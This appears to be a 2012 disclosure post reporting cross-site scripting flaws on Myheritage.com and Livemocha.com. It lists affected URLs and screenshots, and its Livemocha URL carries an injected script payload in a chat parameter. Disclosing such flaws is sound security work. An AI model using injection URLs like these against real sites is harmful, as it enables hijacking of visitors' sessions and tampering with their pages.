Myheritage.com and Livemocha.com suffer from cross site scripting vulnerabilities.
63fb7f976dd3b6213b89488b8fe9ca0bbbf7e625ee2547ed68d10f443a664b16
# Date: 11.03.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Blog: http://st2tea.blogspot.com
..................................................................
Social Networks.
5-10 minute with hands.
Intersting place for cross site scripting.
1. Myheritage.com
We have a multiple persistent cross site scripting vulnerabilities.
I put only 2.
http://www.myheritage.com/site-183672172/styles?popup=4%2C+5547469671#notificationPanelAnchor
http://2.bp.blogspot.com/-s-nwU9rPqvU/T1zYNxFcRYI/AAAAAAAAAuQ/5MRuvBzrelY/s1600/meheritage1.JPG
http://www.myheritage.com/family-1_1000001_183672172_183672172/nepit-private-nepit-private-nepit-born-nedjoli
http://4.bp.blogspot.com/-mkS4ZvBayM0/T1zYUAbFsPI/AAAAAAAAAuc/-BfAQChoHwA/s1600/myheritage2.JPG
2. Livemocha.com
We can see xss after login page.
http://www.livemocha.com/userplane/frames?ext=html&is_src_user=true&strDestinationUserID=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E&frameTarget=/userplane/wm
(it's chat link)
http://2.bp.blogspot.com/-x0_A6-iqYpM/T1zYoiup5PI/AAAAAAAAAuo/YPPqU-IjY5Q/s1600/livem.JPG